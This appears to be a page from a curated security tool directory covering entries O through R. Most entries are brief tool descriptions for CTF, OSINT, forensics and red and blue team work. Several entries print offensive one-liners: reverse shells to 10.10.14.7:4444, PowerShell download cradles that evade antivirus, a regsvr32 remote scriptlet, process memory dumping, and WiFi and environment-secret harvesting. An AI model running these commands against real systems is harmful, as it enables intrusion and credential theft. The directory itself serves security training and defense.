OSV.dev tool

Research

Open-source vulnerability database aggregating advisories across language package ecosystems (npm, PyPI, Go, crates.io, etc) with a queryable API.

visit → added by THUGS(red)

OutGuess tool

CTF Steganography

Universal steganographic tool that hides data in JPEG (and other) images while preserving the cover's statistical properties, making it harder to detect than naive LSB embedding.

outguess -k "key" -d hidden.txt cover.jpg stego.jpg
visit → added by THUGS(red)

Outline VPN tool

Network VPN / Anonymity

Jigsaw (Google)'s self-hosted Shadowsocks-based VPN server and client apps, packaged to make running your own private VPN endpoint on a VPS straightforward for non-experts.

visit → added by THUGS(red)

Overpass Turbo tool

OSINT Recon

Query tool for raw OpenStreetMap data — e.g. find every building matching a roof shape or every fuel station within a radius, useful for geolocation candidates.

visit → added by THUGS(red)

OverTheWire tool

CTF Research

Classic set of SSH-accessible wargames (Bandit, Narnia, Krypton and more) teaching Linux, binary exploitation and cryptography fundamentals level by level.

ssh [email protected] -p 2220
visit → added by THUGS(red)

OWASP Amass tool

Blue Team DNS Enumeration

In-depth attack-surface mapping and asset discovery — combines passive DNS/certificate-transparency sources with active DNS enumeration to build a graph of an organisation's external footprint, used defensively to find shadow-IT assets before an attacker does.

amass enum -d example.com
visit → added by THUGS(red)

OWASP Cheat Sheet Series tool

Cheat Sheets Defensive Web

OWASP's collection of concise, defensive "how to actually do this correctly" references (auth, session management, input validation, crypto storage) rather than attack techniques.

visit → added by THUGS(red)

OWASP ZAP tool

Blackbox Web Whitebox

A free, open-source web application security scanner from OWASP — intercepting proxy, active/passive scanning and automation API, the open-source counterpart to Burp Suite.

visit → added by THUGS(red)

p0f tool Linux

Blue Team Enumeration Network

Passive OS and application fingerprinting from raw traffic characteristics (TCP/IP stack quirks) alone — identifies what is talking on the wire without sending a single probe packet.

p0f -i eth0
visit → added by THUGS(red)

PacketStorm Security tool

Research

Long-running archive of exploits, advisories, tools and papers, mirroring much of Exploit-DB's content alongside its own original submissions.

visit → added by THUGS(red)

PacketTotal tool

Blue Team Network

Free online pcap analysis service — upload a capture and get a Zeek-powered breakdown of connections, files, certificates and suspicious indicators without installing anything.

visit → added by THUGS(red)

Pacu tool

Cloud Offensive Red Team

Open-source AWS exploitation framework for offensive security testing of AWS environments — enumeration, privilege escalation and persistence modules against a real or lab AWS account.

pacu
visit → added by THUGS(red)

PadBuster tool

Cryptography CTF Web

Automates padding oracle attacks against CBC-mode ciphertext (cookies, tokens) when an application leaks a distinguishable error for bad padding.

perl padbuster.pl http://target/ <encrypted> 8 -cookies "auth=<value>"
visit → added by THUGS(red)

padding-oracle-attacker tool

Ciphers Cryptography CTF

Fast CLI/library for exploiting CBC padding oracles, decrypting or forging ciphertext by repeatedly resubmitting modified blocks and reading the oracle's pad-valid/invalid signal.

padding-oracle-attacker decrypt -u https://target/decrypt --data "$CT" --error-string "invalid padding"
visit → added by THUGS(red)

Pagodo tool

OSINT Recon

Automates passive Google Hacking Database dork queries against a target domain and saves the matching results, rather than running each dork by hand.

python3 pagodo.py -d example.com -g dorks.txt -l 100 -s
visit → added by THUGS(red)

Param Miner tool

Fuzzing Red Team Web

PortSwigger's Burp Suite extension for finding hidden, unlinked parameters and headers — including the ones that unlock web-cache-poisoning bugs.

visit → added by THUGS(red)

ParamSpider tool

OSINT Recon Web

Mines URLs with parameters straight out of the Wayback Machine for a target domain — a fast way to build an attack surface list without touching the live site at all.

paramspider -d target.tld
visit → added by THUGS(red)

Parliament tool

Blue Team Cloud Defensive

Duo Labs' AWS IAM policy linter — checks policy documents for syntax errors and known bad patterns before they get attached to a role.

parliament --file policy.json
visit → added by THUGS(red)

Passer tool Linux

Blue Team Enumeration Network

Passive network asset mapping tool — builds an inventory of hosts, services and vulnerabilities purely by watching traffic, no active scanning that could disrupt fragile OT/ICS devices.

passer -i eth0
visit → added by THUGS(red)

Passionfruit tool macOS

Mobile Research

Frida-based web UI for poking at an iOS app's file system, keychain, class list and network traffic on a jailbroken device — a lighter, browser-based alternative to Needle for quick looks.

visit → added by THUGS(red)

PasteBinDorking (Google dork approach to paste sites) one-liner

Cheat Sheets OSINT Recon

Search-engine dork pattern for finding leaked credentials or source snippets accidentally posted to public paste sites for a target domain.

site:pastebin.com "example.com" (password OR api_key OR secret)
# repeat against site:ghostbin.com, site:paste.ee, site:rentry.co for broader paste-site coverage
added by THUGS(red)

Patator tool Linux

Brute Force

Generic, module-based brute-forcer (dozens of modules — SSH, SMTP, HTTP forms, ZIP passwords, DNS, etc) written to avoid the false-positive/false-negative quirks of other bruteforcers.

patator ssh_login host=10.10.10.5 user=admin password=FILE0 0=rockyou.txt
visit → added by THUGS(red)

patchelf tool Linux

Binary / RE CTF

Modifies an ELF's dynamic linker (interpreter) and RPATH after the fact — the standard way to force a CTF pwn binary to run against a downloaded libc instead of the host's.

patchelf --set-interpreter ./ld-2.31.so --set-rpath . ./chall
visit → added by THUGS(red)

PayloadsAllTheThings tool

Cheat Sheets Payloads Web

A huge, actively maintained collection of payloads and bypass techniques for practically every vulnerability class — the reference every web pentester keeps a tab open to.

visit → added by THUGS(red)

PcapXray tool

Blue Team Forensics Network

Generates a visual network diagram from a pcap — hosts, connections, Tor traffic and suspicious flows laid out graphically for a quick "what happened on this network" overview.

python PcapXray.py -f capture.pcap
visit → added by THUGS(red)

PE-bear tool Windows

Binary / RE CTF Malware

GUI PE file analyzer for inspecting and editing headers, sections, imports and resources of Windows executables — a staple for manual PE malware/CTF triage.

visit → added by THUGS(red)

PE-sieve tool Windows

Binary / RE Blue Team Malware

hasherezade's scanner for detecting and dumping malicious implants (process hollowing, reflective DLL injection, shellcode) from a single running Windows process, recovering an unpacked copy for analysis.

pe-sieve64.exe /pid 1234
visit → added by THUGS(red)

PeakFinder tool

OSINT Recon

Renders the mountain skyline visible from any point on Earth and names each peak, used to geolocate a photo by matching its visible ridgeline.

visit → added by THUGS(red)

PEASS-ng (linPEAS / winPEAS) tool

CTF Enumeration Red Team

The standard privilege-escalation enumeration scripts for CTF and OSCP-style practice — linPEAS for Linux, winPEAS for Windows — colour-coded output that flags the most promising misconfigurations first.

curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
visit → added by THUGS(red)

PECmd tool Windows

Blue Team Forensics

Eric Zimmerman's Windows Prefetch parser — turns .pf files into execution history (run count, last-run times, loaded files) for proving what ran on a host and when.

PECmd.exe -d C:\Windows\Prefetch --csv out
visit → added by THUGS(red)

PEDA tool Linux

Binary / RE CTF

Python Exploit Development Assistance for GDB — an older but still-used GDB enhancement predating pwndbg/GEF, with register/stack context and pattern-offset helpers.

echo "source ~/peda/peda.py" >> ~/.gdbinit
visit → added by THUGS(red)

pefile tool

Binary / RE

Python library for parsing and editing PE files, used to script header/section/import inspection instead of clicking through a GUI.

python3 -c "import pefile; pe = pefile.PE('chall.exe'); print(pe.dump_info())"
visit → added by THUGS(red)

peframe tool

Binary / RE Blue Team Malware

Open-source Python tool for static malware analysis of PE files — extracts strings, imports, indicators of packing and generic obfuscation with a simple CLI report.

peframe suspicious.exe
visit → added by THUGS(red)

PentestMonkey Reverse Shell Cheat Sheet tool

Cheat Sheets Payloads Red Team

The canonical one-page reference of reverse shell one-liners in every language likely to be sitting on a compromised box — old, still correct, still bookmarked by everyone.

visit → added by THUGS(red)

PEStudio tool Windows

Binary / RE Blue Team Malware

Static PE-file triage tool that surfaces imports, strings, resources and known-bad indicators in a suspicious Windows executable up front — designed specifically to be run without ever executing the sample.

visit → added by THUGS(red)

PetitPotam tool

Offensive Red Team

A proof-of-concept for coercing a Windows host into authenticating to an attacker-controlled machine via the MS-EFSRPC API — often chained with AD CS relay attacks for domain compromise.

python3 PetitPotam.py 10.10.14.7 10.10.10.10
visit → added by THUGS(red)

PhoneInfoga tool

OSINT Recon

Phone-number OSINT tool that gathers carrier, line type and geolocation data, then cross-references OSINT sources and search-engine footprints for a number.

phoneinfoga scan -n "+15551234567"
visit → added by THUGS(red)

Photon tool

OSINT Recon Web

Fast OSINT-focused web crawler that extracts URLs, emails, social-media handles, subdomains and files (with metadata) from a target site as it crawls.

python3 photon.py -u https://example.com -l 3 --wayback
visit → added by THUGS(red)

PhotoRec tool

Blue Team Forensics

TestDisk's companion file-carving tool — recovers files by signature from a raw disk image or damaged filesystem, ignoring the filesystem structure entirely, which makes it as useful for evidence recovery as for data recovery.

photorec /d recovered/ disk.dd
visit → added by THUGS(red)

Phrack Magazine Archive tool

Research

Every issue of the long-running Phrack e-zine, still publishing original exploitation-technique writeups decades after it started.

visit → added by THUGS(red)

Pi-hole tool Linux

Blue Team Defensive DNS

Network-wide DNS sinkhole — blocks ads and known-malicious domains at resolution time, and its query log doubles as a lightweight DNS monitoring/visibility tool for a home or small office network.

pihole -q malicious-domain.com   # check if/why a domain is being blocked
visit → added by THUGS(red)

picoCTF tool

CTF Research

Carnegie Mellon's beginner-friendly CTF, whose archive of past-competition challenges stays open year-round as a practice platform across binary, crypto, web and forensics categories.

visit → added by THUGS(red)

PimEyes tool

OSINT Research

Facial-recognition reverse image search that finds other photos of the same face across the indexed web — widely used and widely criticised; know your legal/ethical footing before using it on a person.

visit → added by THUGS(red)

PingCastle tool Windows

Enumeration Red Team

Scores an Active Directory forest against common misconfiguration and attack-path categories, producing a risk report used by both auditors and red teamers scoping an AD engagement.

PingCastle.exe --healthcheck
visit → added by THUGS(red)

pipal tool

Brute Force Wordlists

Analyses a leaked or cracked password list and reports the most common base words, lengths and patterns — used to tune a follow-up wordlist or mangling rules against the same target.

ruby pipal.rb cracked.txt
visit → added by THUGS(red)

Pipl tool

OSINT Research

Commercial people-search API aggregating public records, social profiles and contact data for identity-resolution and investigative use cases.

visit → added by THUGS(red)

Pixiewps tool Linux

Brute Force Cryptography Wireless / WiFi

Offline WPS PIN recovery from a single handshake exchange (the "pixie dust" attack) against APs with weak random-number generation, instead of an online brute force.

pixiewps -e <PKE> -r <PKR> -s <E-Hash1> -z <E-Hash2> -a <Authkey> -n <E-Nonce>
visit → added by THUGS(red)

PKINITtools tool Linux

Offensive Red Team

Python tools for requesting Kerberos TGTs via PKINIT with a certificate (including forged ones) and converting the resulting credential into a usable NT hash or ticket.

python3 gettgtpkinit.py -cert-pfx cert.pfx corp.local/user out.ccache
visit → added by THUGS(red)

Plaso (log2timeline) tool

Blue Team Forensics

Framework for creating a "super timeline" from a forensic image — parses dozens of artifact formats into one chronologically sorted event stream for triage in Timesketch or a spreadsheet.

log2timeline.py timeline.plaso image.dd
psort.py -o l2tcsv -w timeline.csv timeline.plaso
visit → added by THUGS(red)

Plaso / log2timeline tool

Blue Team Forensics

Builds a "super timeline" from every timestamped artifact on a disk image or triage collection — filesystem metadata, registry, logs, browser history — merged into one chronological view for an investigator to filter.

log2timeline.py timeline.plaso disk.dd && psort.py -o l2tcsv -w timeline.csv timeline.plaso
visit → added by THUGS(red)

PMapper (Principal Mapper) tool

Blue Team Cloud Enumeration

NCC Group's tool for graphing AWS IAM — identifies privilege escalation paths between IAM principals so defenders can find and fix them before an attacker does.

pmapper graph create\npmapper analysis
visit → added by THUGS(red)

pngcheck tool

CTF Forensics Steganography

Validates a PNG file's chunk structure and reports corruption, unusual/nonstandard chunks or data appended after the IEND marker — a quick check before hunting for hidden data manually.

pngcheck -v suspicious.png
visit → added by THUGS(red)

Popeye tool

Blue Team Cloud Defensive

Kubernetes cluster sanitizer — scans live resources for misconfigurations, deprecated APIs and potential issues, reporting a per-resource 'score' rather than only security findings.

popeye
visit → added by THUGS(red)

Port-forward with netsh portproxy one-liner Windows

Network Red Team

netsh interface portproxy quietly relays a local port to a remote host, a lightweight pivot technique worth using and hunting for alike.

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=445 connectaddress=10.10.10.5
added by THUGS(red)

PortaPack Mayhem tool

Hardware SDR / RF

Community-maintained firmware for the PortaPack add-on that turns a HackRF into a standalone, battery-powered handheld SDR — transmit/receive/replay without a laptop attached.

visit → added by THUGS(red)

PoshC2 tool

Offensive Payloads Red Team

Proxy-aware C2 framework built around PowerShell and C# implants, with built-in modules for AD enumeration and lateral movement.

poshc2 -q default
visit → added by THUGS(red)

PowerShell — download-cradle into memory one-liner Windows

CTF LOLBAS / LOTL Red Team

The classic PowerShell download cradle: pulls a script into memory and runs it without touching disk, so a file-based AV signature never gets a chance to fire.

powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.7:8000/script.ps1')"
visit → added by THUGS(red)

PowerShell — dump a process using a signed system DLL one-liner Windows

Blue Team LOLBAS / LOTL Red Team

Comsvcs.dll's MiniDump export, invoked through rundll32, dumps a process's memory using a Windows-signed DLL — a documented credential-access technique worth knowing defensively too.

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <pid> C:\Windows\Temp\dump.dmp full
visit → added by THUGS(red)

PowerShell — dump saved WiFi passwords one-liner Windows

Enumeration Red Team Wireless / WiFi

netsh (built into every Windows install) will export every remembered WiFi profile with its cleartext key in one loop — a fast post-compromise wireless-credential grab.

netsh wlan show profiles | ForEach-Object { if ($_ -match "All User Profile\s*:\s(.+)") { netsh wlan show profile name="$($matches[1])" key=clear } }
added by THUGS(red)

PowerShell download cradle (Invoke-WebRequest) one-liner Windows

Payloads Red Team

A newer download cradle using Invoke-WebRequest, worth knowing since not every host still has the legacy WebClient path available.

powershell -c "IEX (Invoke-WebRequest -UseBasicParsing http://10.10.14.7/script.ps1).Content"
added by THUGS(red)

PowerShell download cradle (WebClient) one-liner Windows

Payloads Red Team

The classic fileless download-and-execute one-liner: fetches a script into memory and runs it without writing to disk.

powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.7/script.ps1')"
added by THUGS(red)

PowerShell Empire tool Windows

LOLBAS / LOTL Offensive Red Team

A post-exploitation and C2 framework built around PowerShell (and Python) agents — one of the tools that popularised "living off the land" tradecraft in red-team engagements.

visit → added by THUGS(red)

PowerUpSQL tool Windows

Enumeration Offensive Red Team

PowerShell toolkit for discovering and attacking Microsoft SQL Server — instance enumeration, weak login brute-forcing, and abusing linked servers for lateral movement.

Get-SQLInstanceDomain | Get-SQLServerLinkCrawl
visit → added by THUGS(red)

PowerView / PowerSploit tool Windows

Enumeration Offensive Red Team

A PowerShell library for Active Directory situational awareness — domain trusts, group memberships, ACLs and GPOs — that predates BloodHound and still turns up in a lot of AD tradecraft.

Get-DomainUser -SPN | Select SamAccountName,ServicePrincipalName
visit → added by THUGS(red)

PowerView / SharpView tool Windows

Enumeration Offensive Red Team

PowerShell (PowerView, from PowerSploit) and C# (SharpView) tooling for interactively enumerating AD users, groups, ACLs and trusts from a compromised session.

Get-DomainUser -SPN | Select SamAccountName,ServicePrincipalName
visit → added by THUGS(red)

Preeny tool Linux

Binary / RE CTF

Collection of LD_PRELOAD libraries (desock, patchmain and others) that make CTF pwn binaries easier to run and fuzz locally, e.g. turning a socket-only server into one that reads stdin.

LD_PRELOAD=./desock.so ./chall
visit → added by THUGS(red)

primefac tool

Cryptography CTF

Python library implementing several integer factorization algorithms (Pollard rho, Pollard p-1, ECM, multi-polynomial quadratic sieve) as an importable factor() function for solve scripts.

python3 -c "import primefac; print(list(primefac.primefac(N)))"
visit → added by THUGS(red)

Probable Wordlists tool

Brute Force Wordlists

Password lists sorted by real-world frequency (most-likely-first) rather than alphabetically, so a time-boxed cracking run tries the probable candidates before the unlikely ones.

visit → added by THUGS(red)

Process Monitor (Procmon) tool Windows

Blue Team Forensics Malware

Sysinternals tool logging real-time file system, registry and process/thread activity — the standard way to see exactly what a suspicious process is doing on a live Windows host.

procmon.exe /BackingFile trace.pml /Quiet /Minimized
visit → added by THUGS(red)

Procyon tool

Binary / RE CTF

Java decompiler with particularly good handling of modern language features (lambdas, generics) compared to older decompilers.

java -jar procyon.jar -o out ./Challenge.class
visit → added by THUGS(red)

Prowler tool

Blue Team Cloud Whitebox

AWS (and multi-cloud) security best-practices assessment tool covering CIS benchmarks, GDPR, HIPAA and more, run as a CLI against a live account.

prowler aws
visit → added by THUGS(red)

Proxmark3 tool

Hardware NFC / RFID

The de-facto reference RFID/NFC research tool and its firmware/client software — reads, writes, clones and analyses a wide range of low- and high-frequency card technologies.

proxmark3 /dev/ttyACM0
visit → added by THUGS(red)

Proxmark3 (Iceman fork) tool

Hardware NFC / RFID

The community-maintained fork of the Proxmark3 client/firmware, now the de facto standard for anything RFID/NFC beyond casual tag reading — LF/HF, Mifare attacks, standalone scripting.

pm3 -c "hf 14a info"
visit → added by THUGS(red)

Proxychains-ng tool Linux

Network VPN / Anonymity

Forces an arbitrary dynamically-linked program's TCP connections through a chain of SOCKS/HTTP proxies via LD_PRELOAD — the standard way to route tools that have no built-in proxy support.

proxychains4 curl https://example.com
visit → added by THUGS(red)

psbdmp tool

OSINT Research

Searchable archive of pastebin.com dumps going back years, letting you search historical paste content by keyword after the original paste has been deleted.

visit → added by THUGS(red)

PublicWWW tool

OSINT Recon Search Engines Web

Source-code search engine that lets you grep the indexed web for a snippet — a tracking ID, a JS library string or a signature left by a specific web shell/skimmer.

visit → added by THUGS(red)

Pull every unique IP address out of a PCAP one-liner

Blue Team Forensics Network

Extracts and de-duplicates every source/destination IP seen in a capture with tshark, without loading the whole file into Wireshark.

tshark -r capture.pcap -T fields -e ip.src -e ip.dst | tr '\t' '\n' | sort -u
added by THUGS(red)

Pulsedive tool

Blue Team Research Search Engines

Free threat-intelligence search engine that correlates indicators pulled from a wide range of open-source feeds into a single scored lookup.

visit → added by THUGS(red)

Pupy tool

Offensive Payloads Red Team

Cross-platform (Windows/Linux/macOS/Android) open-source RAT and post-exploitation tool with a Python-based, reflectively-injected agent.

visit → added by THUGS(red)

puredns tool

Brute Force DNS Recon

Wraps massdns for reliable bulk DNS resolving and subdomain brute-forcing, with automatic wildcard detection so a wildcard DNS record does not flood results with false positives.

puredns bruteforce wordlist.txt example.com -r resolvers.txt
visit → added by THUGS(red)

Purple Knight tool Windows

Blue Team Defensive Enumeration

Semperis' free Active Directory and Entra ID security assessment tool — checks for dozens of known attack paths and misconfigurations, scored and prioritised for remediation.

visit → added by THUGS(red)

pwnable.kr tool

Binary / RE CTF Research

Long-running wargame focused on system/binary exploitation ("pwnable") challenges of increasing difficulty, one of the most cited practice grounds for CTF pwn.

visit → added by THUGS(red)

pwnable.tw tool

Binary / RE CTF Research

Taiwan-based binary exploitation wargame in the same spirit as pwnable.kr, with a broad and well-regarded set of pwn challenges.

visit → added by THUGS(red)

pwncat tool Linux

CTF Offensive Red Team

Post-exploitation platform that upgrades a raw reverse/bind shell into a persistent, scriptable session with file transfer, privesc enumeration and a local C2-style console.

pwncat-cs -lp 4444
visit → added by THUGS(red)

pwndbg tool Linux

Binary / RE CTF

GDB plugin adding heap/memory visualisation, exploit-dev commands and better context display for pwn work — one of the two dominant GDB enhancements alongside GEF.

echo "source ~/pwndbg/gdbinit.py" >> ~/.gdbinit
visit → added by THUGS(red)

Pwngdb / angelheap tool Linux

Binary / RE CTF

scwuaptx's GDB script (Pwngdb) and companion IDA Pro plugin (angelheap) for visualising glibc heap chunks, bins and tcache state during a heap exploitation session.

visit → added by THUGS(red)

pwninit tool Linux

Binary / RE CTF

Automates the pwn-challenge setup chores: patches a binary's interpreter/rpath to a given libc, fetches a matching ld.so, and scaffolds a pwntools solve script.

pwninit
visit → added by THUGS(red)

pwntools tool Linux

Binary / RE CTF

A Python CTF/exploit-development library — process interaction, packing/unpacking, ROP chain building and remote connection handling, the framework almost every pwn writeup script is built on.

from pwn import *
p = remote('target', 1337)
visit → added by THUGS(red)

pycdc tool

Binary / RE CTF

C++ Python bytecode decompiler covering a much wider range of Python versions than most pure-Python decompilers, handy when a challenge ships an unusual interpreter version.

./pycdc challenge.pyc
visit → added by THUGS(red)

PyCryptodome tool

Cryptography

Self-contained Python cryptographic library (the maintained successor to the abandoned PyCrypto) providing AES/RSA/hashing primitives used in the overwhelming majority of CTF crypto solve scripts.

visit → added by THUGS(red)

pyelftools tool

Binary / RE

Python library for parsing ELF and DWARF, used to script section/symbol/relocation inspection of a Linux binary.

visit → added by THUGS(red)

pySigma tool

Blue Team Defensive

Python library implementing the Sigma rule specification and backend pipelines — what sigma-cli and most Sigma tooling is actually built on.

pip install pysigma pysigma-backend-splunk
visit → added by THUGS(red)

python — spawn a shell inheriting current privileges one-liner Linux

CTF LOLBAS / LOTL Red Team

os.system() from a SUID or sudo-permitted python binary spawns a shell that keeps the elevated privilege — the same idea as the find/awk/vim primitives.

python3 -c 'import os; os.system("/bin/sh")'
visit → added by THUGS(red)

Python one-liner: quick JSON pretty-print from a pipe one-liner

CTF Web

No jq installed? Python's json.tool module is on every box that has Python and does the same job for a quick read.

curl -s https://api.target.tld/data | python3 -m json.tool
added by THUGS(red)

Qiling Framework tool

Binary / RE CTF Malware

Higher-level binary emulation framework built on Unicorn that emulates whole userspace programs (Linux/Windows/macOS/firmware) including syscalls, letting you run a target off its own OS.

qltool run -f ./sample --rootfs ./rootfs
visit → added by THUGS(red)

Quark-Engine tool

Malware Mobile

Android malware-scoring engine that matches API call sequences against a rule set to produce a "how malicious does this behave" score, rather than just a static signature match.

quark -a app.apk -s
visit → added by THUGS(red)

Query FactorDB for an RSA modulus one-liner

Cryptography CTF

Checks FactorDB's public database for a known factorization of an RSA modulus before spending time on local factoring tools — a very common first move in CTF RSA challenges.

curl -s "http://factordb.com/api?query=$N" | python3 -m json.tool
added by THUGS(red)

Query failed logons from the Windows Security log one-liner Windows

Blue Team Defensive Forensics

Pulls recent 4625 (failed logon) events with account and source IP, straight from PowerShell — the first check on a suspected brute-force or password-spray.

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} -MaxEvents 50 |
  Select-Object TimeCreated, @{n='Account';e={$_.Properties[5].Value}}, @{n='SourceIP';e={$_.Properties[19].Value}} |
  Format-Table -AutoSize
added by THUGS(red)

Query journald for a specific service one-liner Linux

Blue Team Forensics

On systemd hosts, journalctl replaces grepping flat log files and filters directly by unit, priority and time window.

journalctl -u sshd --since "1 hour ago" -p warning
added by THUGS(red)

Query osquery for Run-key persistence one-liner

Blue Team Defensive Enumeration

A ready-made osquery query for the classic Windows Run/RunOnce persistence locations — paste it into osqueryi or a scheduled pack.

osqueryi "SELECT * FROM registry WHERE path LIKE 'HKEY_USERS\\%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%';"
added by THUGS(red)

Query the Security log for logon events one-liner Windows

Blue Team Forensics

Event ID 4624 with LogonType 3 (network) or 10 (RDP) is the backbone of almost any lateral-movement timeline reconstruction.

wevtutil qe Security /q:"*[System[(EventID=4624)]]" /f:text /c:20
added by THUGS(red)

Query the unified log for authentication events one-liner macOS

Blue Team Forensics

log show replaces syslog on modern macOS and can filter directly for authorization and authentication activity in a given window.

log show --predicate 'eventMessage contains "authentication"' --last 1h
added by THUGS(red)

Quick check: is this box in a container? one-liner Linux

CTF Enumeration Forensics

A fast triage check for CTF/pentest boxes — cgroup contents and the presence of .dockerenv are the two most reliable tells.

cat /proc/1/cgroup 2>/dev/null; ls -la /.dockerenv 2>/dev/null
added by THUGS(red)

Quick Gatekeeper/quarantine status of a downloaded file one-liner macOS

Forensics Malware

Shows the quarantine extended attribute macOS stamps on anything downloaded from the internet — useful for both malware triage and testing your own tooling's execution path.

xattr -l suspicious_file
added by THUGS(red)

Quick local user recon one-liner Windows

Enumeration

One-liner inventory of local accounts, expiry settings and last logon for a fast privesc and lateral-movement picture.

Get-LocalUser | Select-Object Name, Enabled, PasswordExpires, LastLogon
added by THUGS(red)

Quick reverse shell one-liners, by interpreter one-liner

CTF Red Team

The short-form reverse shells worth memorising when you only have one shot at a command injection — pick whichever interpreter is actually on the target.

bash -i >& /dev/tcp/10.10.14.7/4444 0>&1
perl -e 'use Socket;$i="10.10.14.7";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
php -r '$sock=fsockopen("10.10.14.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
visit → added by THUGS(red)

quipqiup tool

Ciphers CTF

Automatic solver for monoalphabetic substitution ciphers and cryptograms, using letter frequency and dictionary matching to recover plaintext without a known key.

visit → added by THUGS(red)

r2frida tool

Binary / RE Mobile Research

Bridges radare2's static analysis and Frida's dynamic instrumentation into one session, so a mobile (or desktop) binary can be disassembled and hooked from the same prompt.

r2 frida://usb//com.example.app
visit → added by THUGS(red)

radamsa tool

Binary / RE Fuzzing

General-purpose test-case mutator that takes sample inputs and spits out mutated variants — a quick way to build a crude fuzzing corpus for a CTF parser challenge.

radamsa -n 1000 -o out-%n.bin sample.bin
visit → added by THUGS(red)

radare2 tool

Binary / RE CTF

A free, scriptable reverse-engineering framework — disassembler, debugger, hex editor and binary analysis in one command-line-first toolset, with the Cutter GUI on top for those who want it.

r2 -A ./binary
visit → added by THUGS(red)

Radaris tool

OSINT

People-search and public-records aggregator producing background-check-style profiles from court, property and social data.

visit → added by THUGS(red)

rCTF tool

CTF

CTF hosting platform originally built by redpwn for its own large-scale public competitions, offered as an alternative to CTFd for teams running a CTF.

visit → added by THUGS(red)

RDAP (rdap.org) tool

DNS Recon

The structured-JSON successor to WHOIS; rdap.org routes a query to the correct registry and returns machine-parseable output instead of free-text WHOIS.

visit → added by THUGS(red)

Read PowerShell ScriptBlock logs one-liner Windows

Blue Team Forensics

Blue-team side of the download cradle above: ScriptBlock logging (event 4104) captures the deobfuscated command even when it arrived base64-encoded.

Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object Id -eq 4104 | Select-Object -First 20 TimeCreated, Message
added by THUGS(red)

Read process environments for leaked secrets one-liner Linux

Enumeration Forensics Red Team

A process environment, including a credential passed via env rather than argv, is readable through procfs by the owning user or root.

for p in /proc/[0-9]*; do echo "== $p =="; strings $p/environ 2>/dev/null | grep -iE 'pass|key|token'; done
added by THUGS(red)

Reaver (t6x fork) tool Linux

Brute Force Wireless / WiFi

The original online WPS PIN brute-forcer, kept alive as a community fork after the upstream project went unmaintained; still the reference implementation the WPS attack is named after.

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
visit → added by THUGS(red)

Recon-ng tool

OSINT Recon

A full reconnaissance framework with a Metasploit-like module system — dozens of OSINT modules for domains, hosts, contacts and credentials, chained through one console.

visit → added by THUGS(red)

ReconFTW tool Linux

Enumeration Recon Red Team

Automated recon shell script that wraps subfinder, httpx, nuclei and many other tools into one pipeline for full domain reconnaissance ahead of a pentest or bug-bounty hunt.

./reconftw.sh -d example.com -r
visit → added by THUGS(red)

Registry Explorer tool Windows

Blue Team Forensics

Eric Zimmerman's GUI registry hive viewer — bookmarked keys, deleted key recovery and a much friendlier interface than regedit for manual hive investigation.

visit → added by THUGS(red)

RegRipper tool

Blue Team Forensics

Plugin-based Windows registry hive parser — runs a battery of small, purpose-built plugins over a hive (SAM, SYSTEM, SOFTWARE, NTUSER.DAT) to pull out exactly the keys an investigator actually looks for.

rip.pl -r SYSTEM -f system > system_report.txt
visit → added by THUGS(red)

Regshot tool Windows

Blue Team Malware

Takes a registry+filesystem snapshot before and after running a sample and diffs them — the quickest way to see exactly what a piece of malware changed on disk/registry.

visit → added by THUGS(red)

regsvr32 — register a remote scriptlet ("Squiblydoo") one-liner Windows

LOLBAS / LOTL Red Team

A documented technique where regsvr32 registers a remotely hosted COM scriptlet over HTTP — one of the best-known LOLBAS entries.

regsvr32.exe /s /n /u /i:http://10.10.14.7:8000/file.sct scrobj.dll
visit → added by THUGS(red)

Rekall tool

Blue Team Forensics

Google's memory forensics framework, forked from an earlier Volatility codebase before the two diverged — live memory analysis and plugin-based artifact extraction.

visit → added by THUGS(red)

REMnux tool Linux

Blue Team Malware

Lenny Zeltser's curated Linux distribution for malware analysis — pre-installs the FLARE/community toolchain (FLOSS, Capa, YARA tooling, network fakers, deobfuscators) so an analyst is not assembling one tool at a time.

visit → added by THUGS(red)

Responder tool Linux

MITM Network Offensive Red Team

An LLMNR, NBT-NS and MDNS poisoner that harvests NTLM credential hashes from Windows networks that still fall back to these legacy name-resolution protocols.

sudo responder -I eth0 -wrf
visit → added by THUGS(red)

RetDec tool

Binary / RE CTF

Avast's open-source retargetable machine-code decompiler covering several architectures (x86, ARM, MIPS, PowerPC) and executable formats, usable as a CLI or library.

retdec-decompiler ./chall
visit → added by THUGS(red)

Reverse-DNS an entire CIDR block one-liner Linux

DNS Network Recon

Walks every address in a range and runs a PTR lookup on each, a fast way to spot hostnames that hint at a network's internal layout.

for ip in $(prips 10.0.0.0/24); do dig +short -x "$ip"; done
added by THUGS(red)

Reverse-whois an organisation name with Amass' intel mode one-liner

DNS OSINT Recon

Finds netblocks and ASNs registered to a company name before subdomain enumeration even starts, using Amass's intel gathering rather than its enum mode.

amass intel -org "Example Inc"
visit → added by THUGS(red)

reversing.kr tool

Binary / RE CTF Research

Reverse-engineering focused wargame site with a long-standing set of crackme-style challenges.

visit → added by THUGS(red)

Review login history and reboots one-liner Linux

Blue Team Forensics

last reconstructs a login, logout and reboot timeline straight from wtmp, useful for confirming whether a suspicious session actually happened.

last -a | head -30
lastb | head -30
added by THUGS(red)

revshells.com tool

Cheat Sheets Payloads Red Team

Web-based reverse shell generator covering many languages/encodings at once, auto-filling your IP/port and offering URL-encoding and MSFVenom variants without hand-editing a template.

visit → added by THUGS(red)

RFIDIot tool Linux

Hardware NFC / RFID

Adam Laurie's long-running Python library and script collection for RFID reader hardware — tag enumeration, Mifare Classic key attacks and general LF/HF experimentation predating most of today's GUI tools.

visit → added by THUGS(red)

RIPEstat tool

DNS Network Recon

